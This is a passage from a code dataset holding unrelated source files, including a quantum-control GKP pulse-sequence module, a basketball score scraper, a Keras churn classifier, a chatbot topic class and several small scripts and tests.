There \n                will be additional processing time contribution on top of this.\n            log (bool): flag to log the measurement outcome.\n            res_name (str): name of the result if measurement is logged.\n        \"\"\"\n        sync()\n        delay(echo_delay, channel=self.qubit.chan, round=True)\n        self.qubit.flip() # echo pulse\n        self.readout(wait_result=True, log=log, sync_at_beginning=False, **{res_name:'se'})\n        sync()\n        delay(feedback_delay, round=True)\n        if_then_else(self.qubit.measured_low(), 'flip', 'wait')\n\n        label_next('flip')\n        self.qubit.flip()\n        goto('continue')\n\n        label_next('wait')\n        delay(self.qubit.pulse.length)\n        goto('continue')\n\n        label_next('continue')\n        delay(final_delay, round=True)\n        sync()\n\n    @subroutine\n    def reset_feedback_with_phase_update(self, phase_reg, phase_g_reg, phase_e_reg,\n                log=False, res_name='default', detune=0.0, drag=0.0):\n        \"\"\"\n        Feedback reset with a qubit-state-dependent phase update.\n\n        Args:\n            phase_reg (Register): phase register to be updated.\n            phase_g_reg, phase_e_reg (Register): phases that will be added to\n                the phase_reg depending on the measured outcome.\n            log (bool): flag to log the measurement outcome.\n            res_name (str): name of the result if measurement is logged.\n            detune, drag (float): extra detuning and drag that will be added\n                to the calibrated pulse values.\n        \"\"\"\n        sync()\n        self.readout(wait_result=True, log=log, **{res_name:'se'})\n        delay(4*Timing.send_ext_fn) # TODO: might not need this set_int_fn\n        if_then_else(self.qubit.measured_low(), 'wait', 'flip')\n\n        label_next('flip')\n        self.qubit.flip(detune=self.qubit.pulse.detune+detune, drag=self.qubit.pulse.drag+drag)\n        phase_reg += phase_e_reg\n        goto('continue')\n\n        label_next('wait')\n        self.qubit.delay(self.qubit.pulse.length)\n        phase_reg += phase_g_reg\n        goto('continue')\n\n        label_next('continue')\n        sync()\n\n    @subroutine\n    def reset_feedback_with_phase_update_and_Kerr_drive(self, phase_reg, phase_g_reg, phase_e_reg,\n                log=False, res_name='default', detune=0.0, drag=0.0,\n                Kerr_g_amp=0.0, Kerr_e_amp=0.0):\n        \"\"\"\n        Feedback reset with phase update and Kerr-cancelling drive. 
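The measurement outcome selects both the phase increment and the\n        amplitude of the Kerr-cancelling drive played on the detuned qubit mode.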
\n\n        Args:\n            phase_reg (Register): phase register to be updated.\n            phase_g_reg, phase_e_reg (Register): phases that will be added to\n                the phase_reg depending on the measured outcome.\n            log (bool): flag to log the measurement outcome.\n            res_name (str): name of the result if measurement is logged.\n            detune, drag (float): extra detuning and drag that will be added\n                to the calibrated pulse values.\n            Kerr_g_amp, Kerr_e_amp (float): amplitude of the Kerr drive\n        \"\"\"\n        sync()\n        self.readout(wait_result=True, log=log, **{res_name:'se'})\n        delay(4*Timing.send_ext_fn) # TODO: might need set_int_fn?\n        if_then_else(self.qubit.measured_low(), 'meas_g', 'meas_e')\n\n        label_next('meas_e')\n        sync()\n        self.qubit.flip(detune=self.qubit.pulse.detune+detune, drag=self.qubit.pulse.drag+drag)\n        phase_reg += phase_e_reg\n        sync()\n        self.qubit_detuned.smoothed_constant_pulse(self.Kerr_drive_time_ns,\n                    amp=Kerr_e_amp, sigma_t=self.Kerr_drive_ramp_ns)\n        self.update_phase(phase_reg, self.cavity, self.t_mixer_calc_ns)\n        sync()\n        goto('continue')\n\n        label_next('meas_g')\n        sync()\n        self.qubit.delay(self.qubit.pulse.length)\n        phase_reg += phase_g_reg\n        sync()\n        self.qubit_detuned.smoothed_constant_pulse(self.Kerr_drive_time_ns,\n                    amp=Kerr_g_amp, sigma_t=self.Kerr_drive_ramp_ns)\n        self.update_phase(phase_reg, self.cavity, self.t_mixer_calc_ns)\n        sync()\n        goto('continue')\n\n        label_next('continue')\n        sync()\n\n    def reset_autonomous_Murch(self, qubit_detuned_obj, readout_detuned_obj,\n                cool_duration_ns, qubit_ramp_ns, readout_ramp_ns,\n                qubit_amp, readout_amp, qubit_detune_MHz, readout_detune_MHz,\n                qubit_angle, qubit_phase, final_delay):\n        \"\"\"\n        Set up autonomous qubit cooling based on this Murch paper:\n        https://journals.aps.org/prl/abstract/10.1103/PhysRevLett.109.183602\n\n        Args:\n            qubit_detuned_obj (Mode): qubit mode to use in the protocol\n            readout_detuned_obj (Mode): readout mode to use in the protocol\n            cool_duration_ns (int): how long in [ns] to hold the constant\n                Rabi drive on the qubit after ramping it up.\n            qubit_ramp_ns (int): duration in [ns] of the qubit Rabi drive\n                ramp up/down.\n            readout_ramp_ns (int): duration in [ns] of the detuned readout\n                drive ramp up/down. This can typically be shorter than the\n                qubit ramp because the pulse is far detuned.\n            qubit_amp (float): amplitude of the qubit Rabi pulse.\n            readout_amp (float): amplitude of the detuned readout pulse.\n            readout_detune_MHz (float): detuning of the readout pulse in [MHz]. 
\n                Ideally equal to the qubit Rabi rate.\n            qubit_detune_MHz (float): detuning of the qubit pulse in [MHz]\n            qubit_angle, qubit_phase (float): final qubit rotation parameters\n            final_delay (int): delay in [ns] after the cooling protocol\n\n        Returns:\n            cooling subroutine.\n        \"\"\"\n        self.qubit_detuned = qubit_detuned_obj\n        self.readout_detuned = readout_detuned_obj\n\n        sync()\n        self.readout_detuned.set_detune(readout_detune_MHz*1e6)\n        self.qubit_detuned.set_detune(qubit_detune_MHz*1e6)\n        sync()\n\n        qubit_pump_time = cool_duration_ns\n        readout_pump_time = cool_duration_ns+2*qubit_ramp_ns-2*readout_ramp_ns\n\n        @subroutine\n        def cooling_Murch():\n            sync()\n            self.readout_detuned.smoothed_constant_pulse(\n                    readout_pump_time, amp=readout_amp, sigma_t=readout_ramp_ns)\n            self.qubit_detuned.smoothed_constant_pulse(\n                    qubit_pump_time, amp=qubit_amp, sigma_t=qubit_ramp_ns)\n            sync()\n            self.qubit.rotate(qubit_angle, qubit_phase)\n            sync()\n            delay(final_delay, round=True)\n\n        return lambda: cooling_Murch()\n\n    def sbs(self, eps1, eps2, beta, s_tau_ns, b_tau_ns):\n        \"\"\"\n        Single step of the SBS protocol based on this Baptiste paper:\n        https://journals.aps.org/prl/abstract/10.1103/PhysRevLett.125.260509\n\n        The pulse sequence is compiled based on the independent calibration of\n        the conditional displacement amplitude.\n\n        Args:\n            eps1, eps2 (float): 1st/2nd small CD amplitude\n            beta (float): big CD amplitude\n\n            s_tau_ns, b_tau_ns (int): wait time in the small/big CD gate\n        \"\"\"\n        CD_compiler_kwargs = dict(qubit_pulse_pad=self.qubit_pulse_pad)\n        C = SBS_simple_compiler(CD_compiler_kwargs, self.cal_dir)\n\n        cavity_pulse, qubit_pulse = C.make_pulse(1j*eps1/2.0, 1j*eps2/2.0, beta,\n                                                 s_tau_ns, b_tau_ns)\n\n        def sbs_step(s):\n            \"\"\"\n            Args:\n                s (str): stabilization quadrature, either 'x' or 'p'\n            \"\"\"\n            phase = dict(x=0.0, p=np.pi/2.0)\n            sync()\n            self.cavity.array_pulse(*cavity_pulse, phase=phase[s])\n            self.qubit.array_pulse(*qubit_pulse)\n            sync()\n\n        return sbs_step\n\n    def load_sbs_sequence(self, s_tau, b_tau, ECD_filename, version):\n        \"\"\"\n        Args:\n            version (str):\n                - v1 is a simple version in which only ECD parameters beta & phi\n                  are loaded from the file.\n                - v2 is a more complicated version in which qubit detunings and\n                  parameters of the pi-pulses are also used in addition to beta & phi.\n                - v3 is like v2 but it returns an sbs_step that uses a dynamic mixer.\n        \"\"\"\n        if version == 'v1':\n            data = np.load(ECD_filename, allow_pickle=True)\n            beta, phi = data['beta'], data['phi']\n            tau = np.array([s_tau, b_tau, s_tau, 0])\n\n            CD_compiler_kwargs = dict(qubit_pulse_pad=self.qubit_pulse_pad)\n            C = ECD_control_simple_compiler(CD_compiler_kwargs, self.cal_dir)\n            c_pulse, q_pulse = C.make_pulse(beta, phi, tau)\n        if version in ['v2', 'v3']:\n            data = np.load(ECD_filename, allow_pickle=True)\n            beta, phi, phi_CD, alpha_correction = data['beta'], data['phi'], data['flip'], data['alpha_correction']\n            detune, drag = data['qb_detune']*np.ones([4,2]), data['qb_drag']*np.ones([4,2])\n\n            tau = np.array([s_tau, b_tau, s_tau, 0])\n\n            CD_compiler_kwargs = dict(qubit_pulse_pad=self.qubit_pulse_pad)\n            C = ECD_control_simple_compiler(CD_compiler_kwargs, self.cal_dir)\n            c_pulse, q_pulse = C.make_pulse_v2(beta, phi, phi_CD, tau, detune, alpha_correction, drag)\n\n        if version in ['v1', 'v2']:\n            def sbs_step(s):\n                \"\"\"\n                Args:\n                    s (str): stabilizer direction, either 'x' or 'p'\n                \"\"\"\n                phase = dict(x=0.0, p=np.pi/2.0)\n                sync()\n                self.cavity.array_pulse(c_pulse.real, c_pulse.imag, phase=phase[s])\n                
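# (added note) the cavity pulse above and the qubit pulse below are issued\n                # within the same sync block; only the cavity pulse's phase depends on\n                # the chosen quadrature s.\n                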
self.qubit.array_pulse(q_pulse.real, q_pulse.imag)\n sync()\n \n if version == 'v3':\n def sbs_step():\n sync()\n self.cavity.array_pulse(c_pulse.real, c_pulse.imag, amp='dynamic')\n self.qubit.array_pulse(q_pulse.real, q_pulse.imag)\n sync() \n \n return sbs_step\n \n def export_ECDC_to_array_pulse(self, ecdc_filename, array_pulse_filename, **kwargs):\n \"\"\"\" Convert ECDC sequence to an array pulse and export it to a file.\n This is useful in case when different calibrated pulse parameters change\n and the previously optimized sequence becomes suboptimal. Saving the\n whole array pulse avoids this problem, since it no longer relies on cal.\"\"\"\n \n cond = 'qubit_pulse_pad' in kwargs.keys()\n qubit_pulse_pad = kwargs.pop('qubit_pulse_pad') if cond else self.qubit_pulse_pad\n \n cond = 'init_tau_ns' in kwargs.keys()\n init_tau_ns = kwargs.pop('init_tau_ns') if cond else self.init_tau_ns\n \n cond = 'cal_dir' in kwargs.keys()\n cal_dir = kwargs.pop('cal_dir') if cond else self.cal_dir \n \n CD_compiler_kwargs = dict(qubit_pulse_pad=qubit_pulse_pad)\n C = ECD_control_simple_compiler(CD_compiler_kwargs, cal_dir)\n data = np.load(ecdc_filename, allow_pickle=True)\n beta, phi = data['beta'], data['phi']\n tau = np.array([init_tau_ns]*len(data['beta']))\n c_pulse, q_pulse = C.make_pulse(beta, phi, tau)\n np.savez(array_pulse_filename, c_pulse=c_pulse, q_pulse=q_pulse)\n \n\n def stabilizer_phase_estimation(self, tau_ns):\n \n beta = np.sqrt(2*np.pi) # stabilizer CD amplitude\n C = ConditionalDisplacementCompiler(qubit_pulse_pad=self.qubit_pulse_pad)\n CD_params = C.CD_params_fixed_tau_from_cal(beta, tau_ns, self.cal_dir)\n cavity_pulse, qubit_pulse = C.make_pulse(*CD_params)\n \n def stabilizer_phase_estimation(s):\n phase = {'x' : 0.0, 'x+' : 0.0, 'x-' : np.pi, \n 'p' : np.pi/2.0, 'p+' : np.pi/2.0, 'p-' : -np.pi/2.0}\n sync()\n self.qubit.pi2_pulse(phase=np.pi/2.0)\n sync()\n self.cavity.array_pulse(*cavity_pulse, phase=phase[s])\n self.qubit.array_pulse(*qubit_pulse)\n sync()\n self.qubit.pi2_pulse(phase=-np.pi/2.0)\n sync()\n delay(24)\n self.readout(**{s:'se'})\n sync()\n \n return stabilizer_phase_estimation\n \n \n\n def displacement_phase_estimation(self, beta, tau_ns, res_name, \n echo_params=None, amp=1):\n \n C = ConditionalDisplacementCompiler(qubit_pulse_pad=self.qubit_pulse_pad)\n CD_params = C.CD_params_fixed_tau_from_cal(beta, tau_ns, self.cal_dir)\n cavity_pulse, qubit_pulse = C.make_pulse(*CD_params)\n \n sync()\n self.qubit.pi2_pulse(phase=np.pi/2.0)\n sync()\n self.cavity.array_pulse(*cavity_pulse, amp=amp)\n self.qubit.array_pulse(*qubit_pulse)\n sync()\n self.qubit.pi2_pulse(phase=-np.pi/2.0)\n sync()\n delay(24)\n if echo_params is not None:\n self.reset_feedback_with_echo(\n echo_params['echo_delay'], echo_params['final_delay'], \n log=True, res_name=res_name)\n else:\n self.readout(**{res_name:'se'})\n sync()\n \n\n def update_phase(self, phase_reg, mode, t_mixer_calc=400):\n c = FloatRegister()\n s = FloatRegister()\n c = af_cos(phase_reg)\n s = af_sin(phase_reg)\n DynamicMixer[0][0] <<= c\n DynamicMixer[1][0] <<= s\n DynamicMixer[0][1] <<= -s\n DynamicMixer[1][1] <<= c\n mode.delay(t_mixer_calc)\n mode.load_mixer()\n \n @subroutine\n def reset_mixer(self, mode, t_mixer_calc):\n sync()\n zero_phase_reg = FloatRegister(0)\n self.update_phase(zero_phase_reg, mode, t_mixer_calc)\n sync()\n 
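\n\n# Usage sketch (added comment; 'qubit', 'readout' and the attached 'cavity' modes\n# are assumed to be configured elsewhere, and the parameter values are illustrative):\n#   gkp = GKP(qubit, readout)\n#   sbs_step = gkp.sbs(eps1=0.2, eps2=0.2, beta=np.sqrt(2*np.pi),\n#                      s_tau_ns=gkp.s_tau_ns, b_tau_ns=gkp.b_tau_ns)\n#   sbs_step('x')  # one SBS round stabilizing the x quadrature\n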
","sub_path":"gkp_qec/GKP.py","file_name":"GKP.py","file_ext":"py","file_size_in_byte":16249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205844757","text":"n=int(input())\n\nfor _ in range(n):\n s=input()\n for i in range(len(s)-1):\n if s[i]!=s[i+1]:\n if s[i] in s[i+1:]:\n n-=1\n break\nprint(n)\n","sub_path":"boj(baekjoon)/boj_1316.py","file_name":"boj_1316.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564377077","text":"from typing import Dict, Any, List, Optional, Union\n\n\ndef parse_topic(raw_topic: Dict[str, Any]) -> \"Topic\":\n topic_type = raw_topic[\"type\"]\n if topic_type == \"simple\":\n return Topic.from_dict(raw_topic)\n\n\nclass Topic:\n \"\"\"Topic to explain.\n\n Author: Bruno.\n \"\"\"\n\n def __eq__(self, other):\n return self._id == other._id\n\n @staticmethod\n def from_dict(raw_topic: Dict[str, Any]) -> \"Topic\":\n if raw_topic.get(\"examples\") is None:\n examples = []\n else:\n examples = raw_topic.get(\"examples\")\n if raw_topic.get(\"sub_topics\") is None:\n subtopics = []\n else:\n subtopics = [parse_topic(raw_topic) for raw_topic in raw_topic[\"sub_topics\"]]\n if raw_topic.get(\"questions\") is None:\n questions = []\n else:\n questions = raw_topic.get(\"questions\")\n return Topic(raw_topic[\"topic_id\"],\n raw_topic[\"utters\"],\n examples,\n subtopics,\n questions)\n\n # noinspection PyTypeChecker\n def __init__(\n self,\n topic_id: str,\n utters_explanations: List[str],\n examples: Optional[List[str]] = None,\n sub_topics: Optional[List[\"Topic\"]] = None,\n questions: Optional[List[str]] = None\n ):\n \"\"\"\n Constructor.\n\n Author: Bruno.\n\n Parameters\n ----------\n topic_id\n Identification for the topic.\n utters_explanations\n Possible explanations for the topic.\n examples\n Examples to give for the topic.\n sub_topics\n Sub topics of the topic.\n questions\n Questions to make to the user.\n \"\"\"\n self._id = topic_id\n self._utters_explanations = utters_explanations\n # Default detail level is the middle one.\n self._detail_level = int(len(utters_explanations) / 2)\n self.is_explained = False\n\n self._examples = [] if examples is None else examples\n self._current_example = 0\n\n self._sub_topics = [] if sub_topics is None else sub_topics\n self._current_sub_topic = 0\n\n self._questions = [] if questions is None else questions\n self._current_question = 0\n\n def get(self) -> Dict[str, \"Topic\"]:\n \"\"\"\n Get the current topic.\n\n Author: Tomas\n\n Returns\n -------\n Dictionary with the current topic's information and\n each subtopic within the main topic.\n \"\"\"\n topics = {self._id: self}\n for topic in self._sub_topics:\n topics.update(topic.get())\n return topics\n\n def set_current_example(self, example: int):\n \"\"\"\n Set the current examples' index.\n\n Author: Tomas\n\n Parameters\n ----------\n\n example\n new examples' index\n \"\"\"\n self._current_example = example\n\n def get_current_example(self) -> int:\n \"\"\"\n Get the current examples' index.\n\n Author: Tomas\n\n Returns\n -------\n The index of the current example.\n \"\"\"\n return self._current_example\n\n def get_explanation(self, mark_as_explained: bool = True) -> str:\n \"\"\"Explains the topic. 
Marks the topic as explained.\n\n        Author: Bruno.\n\n        Returns\n        -------\n        Utter associated to the explanation with current detail level.\n        \"\"\"\n        if mark_as_explained:\n            self.is_explained = True\n        if self._detail_level >= len(self._utters_explanations):\n            self._detail_level = 0\n        return self._utters_explanations[self._detail_level]\n\n    def get_example(self) -> str:\n        \"\"\"\n        Get the utter associated to the next example to give.\n\n        Author: Tomas\n\n        Returns\n        -------\n        Utter associated to the next example if the topic has any example,\n        otherwise it returns a default utter.\n        \"\"\"\n        if self._current_example < len(self._examples):\n            example = self._examples[self._current_example]\n            self._current_example += 1\n            return example\n        else:\n            self._current_example = 0\n            return \"utter_sin_ejemplos\"\n\n    def get_question(self) -> str:\n        \"\"\"\n        Get the utter associated to the topic's next question.\n\n        Author: Adrian\n\n        Returns\n        -------\n        Utter associated to the next question if the topic has any,\n        otherwise it returns a default utter.\n        \"\"\"\n        if self._current_question < len(self._questions):\n            question = self._questions[self._current_question]\n            self._current_question += 1\n            return question\n        else:\n            self._current_question = 0\n            return \"utter_sin_question\"\n\n    def next(self) -> Union[\"Topic\", None]:\n        \"\"\"Returns the next topic to explain.\n\n        Author: Bruno.\n\n        Returns\n        -------\n        Next topic to explain.\n        \"\"\"\n        if not self.is_explained:\n            return self\n\n        if self._current_sub_topic < len(self._sub_topics):\n            topic = self._sub_topics[self._current_sub_topic]\n            self._current_sub_topic += 1\n            return topic\n\n        return None\n\n    def restart(self):\n        \"\"\"Restarts the topic, so it can be explained again.\n\n        Author: Bruno.\n        \"\"\"\n        self.is_explained = False\n        self._current_example = 0\n        self._current_sub_topic = 0\n        for topic in self._sub_topics:\n            topic.restart()\n\n    def get_id(self) -> str:\n        \"\"\"\n        Get the current topic ID\n\n        Author: Adrian\n\n        Returns\n        -------\n        Topic's name.\n        \"\"\"\n        return self._id\n\n    def set_explained(self, explained: bool):\n        \"\"\"\n        Set the current topic as explained or not explained.\n\n        Author: Adrian\n\n        Parameters\n        ----------\n\n        explained\n            Boolean value to set if the current topic is explained or not.\n        \"\"\"\n        self.is_explained = explained\n\n    @property\n    def repeat(self) -> str:\n        \"\"\"Repeats the explanation for the topic.\n\n        Author: Bruno.\n\n        Returns\n        -------\n        Utter associated to the explanation with next detail level if possible.\n        Otherwise returns the utter for the maximum detail level.\n        \"\"\"\n        self._detail_level += 1\n\n        # Mark as explained even though it was not explained well\n        self.is_explained = True\n        if self._detail_level >= len(self._utters_explanations):\n            return self._utters_explanations[-1]  # -1 = last element.\n\n        return self._utters_explanations[self._detail_level]\n\n    def get_amount_subtopics(self) -> int:\n        \"\"\"\n        Get the amount of subtopics of the current topic.\n\n        Author: Tomas\n\n        Returns\n        -------\n        Returns the amount of subtopics that the current topic has.\n        \"\"\"\n        return self._current_sub_topic\n","sub_path":"tour/topic/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"135076150","text":"from aiohttp import ClientSession\nimport aiohttp\nimport json\nfrom apps.NBL.tools import safe_get\nimport time\nfrom common.libs.log import LogMgr\n\n\n# Set up logging\nlogger = 
LogMgr.get('acb_score_svr')\n\n\nclass GetScores(object):\n    async def get_scores(self, game_id):\n        url = 'https://www.fibalivestats.com/data/%s/data.json' % str(game_id)\n        conn = aiohttp.TCPConnector(verify_ssl=False)\n        async with ClientSession(connector=conn) as session:\n            try:\n                logger.info('before request ...')\n                logger.info(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))\n                async with session.get(url) as response:\n                    logger.info('after request ...')\n                    logger.info(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))\n                    if response.status == 200:\n                        response = await response.text()\n                        player_stat = json.loads(response)\n                        try:\n                            scores_info = player_stat['pbp'][0]\n                            home_p1_score = safe_get(player_stat,'tm.1.p1_score')\n                            home_p2_score = safe_get(player_stat,'tm.1.p2_score')\n                            home_p3_score = safe_get(player_stat,'tm.1.p3_score')\n                            home_p4_score = safe_get(player_stat,'tm.1.p4_score')\n                            home_p5_score = safe_get(player_stat,'tm.1.p5_score')\n                            away_p1_score = safe_get(player_stat,'tm.2.p1_score')\n                            away_p2_score = safe_get(player_stat,'tm.2.p2_score')\n                            away_p3_score = safe_get(player_stat,'tm.2.p3_score')\n                            away_p4_score = safe_get(player_stat,'tm.2.p4_score')\n                            away_p5_score = safe_get(player_stat,'tm.2.p5_score')\n                            home_scores = [home_p1_score,home_p2_score,home_p3_score,home_p4_score,home_p5_score]\n                            away_scores = [away_p1_score,away_p2_score,away_p3_score,away_p4_score,away_p5_score]\n                            home_scores_total = sum(home_scores)\n                            away_scores_total = sum(away_scores)\n                            if player_stat['inOT'] != 0:\n                                period = scores_info['period'] + 4\n                            else:\n                                period = scores_info['period']\n                            match_time = scores_info['gt']\n                            minutes = match_time.split(':')[0]\n                            second = match_time.split(':')[1]\n                            seconds = int(minutes) * 60 + int(second)\n                            if period < 5:\n                                if match_time == '00:00':\n                                    status_id = 2 * period + 1\n                                else:\n                                    status_id = 2 * period\n                            else:\n                                status_id = 9\n                            if seconds == 0 and period >= 4 and home_scores_total != away_scores_total:\n                                status_id = 10\n                            data = {\n                                'sport_id': 2,\n                                'site': 'acb',\n                                'matches': {\n                                    game_id: {\n                                        'score': {\n                                            'tmr': {'ticking': 0, 'coundown': 1, 'addtime': 0, 'second': seconds},\n                                            'status_id': status_id,\n                                            'home_scores': home_scores,\n                                            'away_scores': away_scores,\n                                        }\n                                    }\n                                }\n                            }\n                            return data\n                        except:\n                            return 0\n                    else:\n                        return 0\n            except:\n                return 0\n","sub_path":"apps/ACB/acb_score.py","file_name":"acb_score.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149692422","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO_BUZZER = 21\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(GPIO_BUZZER, GPIO.OUT, initial=GPIO.LOW)\nHz = 440 * 3\np = GPIO.PWM(GPIO_BUZZER, 1)\np.ChangeFrequency(Hz)\np.start(50)\ntime.sleep(0.05)\np.stop()\ntime.sleep(0.05)\np.ChangeFrequency(Hz)\np.start(50)\ntime.sleep(0.05)\np.stop()\nGPIO.cleanup()\n","sub_path":"buzzer.py","file_name":"buzzer.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195886800","text":"################################################################################\n#                          Artificial Neural Network                           #\n#                       Would a customer leave the bank?                       
#\n#                                  Featuring:                                  #\n#        * 8-fold cross validation evaluation schema                           #\n#        * 2 hidden layers                                                     #\n#        * BatchNormalization                                                  #\n################################################################################\n'''\nMake sure Python supports TensorFlow by installing Python version 3.5.3.\nRead the \"py53\" text file.\n'''\nimport os\nimport datetime\nimport numpy as np\nimport random\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import cross_val_score, train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nimport keras\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers.normalization import BatchNormalization\nfrom tensorflow.contrib.keras import backend\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'  # filter out WARNING logs\n\n\n#########################\n# Define the ANN schema #\n#########################\ndef build_classifier():\n    classifier = Sequential(layers=None)  # the design of the layers would be manual\n    # Add the input layer and the first hidden layer\n    classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))\n    classifier.add(BatchNormalization())\n    # Add a second hidden layer\n    classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n    classifier.add(BatchNormalization())\n    # Add the output layer\n    classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n    # Compiling the ANN\n    classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n    # Return the classifier\n    return classifier\n\n\nif __name__ == \"__main__\":\n    ################\n    # Get the Data #\n    ################\n    # Importing the dataset\n    dataset = pd.read_csv(os.path.join('data', 'Churn_Modelling.csv'))  # , index_col='RowNumber')\n    # Keep only useful columns\n    dataset.drop(['RowNumber', 'CustomerId', 'Surname'], axis=1, inplace=True)\n    X = dataset.drop(['Exited'], axis=1).values  # returns numpy.ndarray\n    y = dataset.loc[:, 'Exited'].values\n\n    ######################\n    # Data Preprocessing #\n    ######################\n    # 1. Encoding the Independent (categorical) Variables\n    # Convert labels [Germany, France, Spain] into levels [1, 2, 3]\n    labelencoder_X_1 = LabelEncoder()\n    X[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\n    labelencoder_X_2 = LabelEncoder()\n    X[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\n    # 2. Convert levels [1, 2, 3] into one-hot representation [001, 010, 100]\n    onehotencoder = OneHotEncoder(categorical_features=[1])\n    X = onehotencoder.fit_transform(X).toarray()\n    # 3. 
Remove a single one-hot variable to avoid the dummy variable trap\n    X = X[:, 1:]  # remove column 0\n\n    #####################\n    # Split the Dataset #\n    #####################\n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1633)\n\n    ###################\n    # Feature Scaling #\n    ###################\n    sc = StandardScaler()\n    X_train = sc.fit_transform(X_train)\n    X_test = sc.transform(X_test)\n\n    #################\n    # Train the ANN #\n    #################\n    random.seed(1553)\n    # Global classifier variable\n    classifier = KerasClassifier(\n        # Supply the ANN architecture\n        build_fn=build_classifier,\n        # Supply the training parameters\n        batch_size=10,\n        epochs=100)\n\n    # Execute cross validation\n    time_0 = datetime.datetime.now()\n    accuracies = cross_val_score(estimator=classifier,\n                                 X=X_train, y=y_train,\n                                 cv=8,\n                                 n_jobs=-1)\n    time_taken = datetime.datetime.now() - time_0\n\n    ######################\n    # Evaluate the Model #\n    ######################\n    mean = accuracies.mean()\n    var = accuracies.std() ** 2\n\n    #############################\n    # Remove model from CPU/GPU #\n    #############################\n    backend.clear_session()\n\n    #################\n    # Print Results #\n    #################\n    print('\\n###########################################################')\n    print('# Avg Accuracy: ' + str(mean))  # Avg Accuracy: 0.8361\n    print('# Variance: ' + str(var))  # Variance: 0.0002\n    print('# Time: ' + str(time_taken))  # Time: 0:03:38\n    print('###########################################################\\n')\n","sub_path":"topic_1_ANN/banking_churn_basic_K_fold_CV.py","file_name":"banking_churn_basic_K_fold_CV.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178632369","text":"# This file is placed in the Public Domain.\n\n\n\"commands\"\n\n\nfrom ..objects import Object\n\n\ndef __dir__():\n    return (\n        'Command',\n    )\n\n\n__all__ = __dir__()\n\n\nclass Command(Object):\n\n    cmds = Object()\n    errors = []\n\n    @staticmethod\n    def add(cmd):\n        setattr(Command.cmds, cmd.__name__, cmd)\n\n    @staticmethod\n    def dispatch(evt):\n        if not evt.isparsed:\n            evt.parse(evt.txt)\n        func = getattr(Command.cmds, evt.cmd, None)\n        if func:\n            try:\n                func(evt)\n            except Exception as ex:\n                exc = ex.with_traceback(ex.__traceback__)\n                Command.errors.append(exc)\n            evt.ready()\n            return None\n        evt.show()\n        evt.ready()\n\n    @staticmethod\n    def remove(cmd):\n        delattr(Command.cmds, cmd)\n","sub_path":"rssbot/runtime/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298248598","text":"def split(line, types=None, delimiter=None):\n    \"\"\"Splits a line of text and optionally performs type conversion.\n    For example:\n\n    >>> split('GOOD 100 490.50')\n    ['GOOD', '100', '490.50']\n    >>> split('GOOD 100 490.50', [str, int, float])\n    ['GOOD', 100, 490.5]\n    >>>\n    By default, splitting is performed on whitespace, but a different delimiter\n    can be selected with the delimiter keyword argument:\n\n    >>> split('GOOD, 100, 490.50', delimiter=',')\n    ['GOOD', ' 100', ' 490.50']\n    >>>\n    \"\"\"\n\n    fields = line.split(delimiter)\n    if types:\n        fields = [ty(val) for ty, val in zip(types, fields)]\n    return fields\n\nif __name__ == '__main__':\n    # test myself\n    import doctest\n    
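# doctest collects the '>>>' examples from this module's docstrings and\n    # compares each actual result against the expected output shown below it\n    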
doctest.testmod(verbose=True)","sub_path":"pyDemo/doc_test/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205899849","text":"import csv\n\nfrom django.test import TestCase\n\nfrom django_test_tools.file_utils import temporary_file\nfrom django_test_tools.mixins import TestOutputMixin\n\n\nclass TestTestOutputMixin(TestCase):\n @temporary_file('csv', delete_on_exit=True)\n def test_get_csv_content(self):\n outputfile = self.test_get_csv_content.filename\n with open(outputfile, 'w', encoding='utf-8') as csvfile:\n csv_writer = csv.writer(csvfile, delimiter=',')\n csv_writer.writerow(['Title 1', 'Title 2', 'Title 3', 'Title 4', 'Title 5'])\n for i in range(0, 6):\n csv_writer.writerow(['Data {0}'.format(i)] * 5)\n\n output_mixin = TestOutputMixin()\n data = output_mixin.get_csv_content(outputfile)\n self.assertEqual(7, len(data))\n self.assertEqual('Title 1', data[0][0])\n","sub_path":"tests/test_mixins.py","file_name":"test_mixins.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553594505","text":"from ftw.testbrowser import browsing\nfrom opengever.bumblebee.events import PDFDownloadedEvent\nfrom opengever.journal.handlers import DOCUMENT_ADDED_ACTION\nfrom opengever.testing import IntegrationTestCase\nfrom 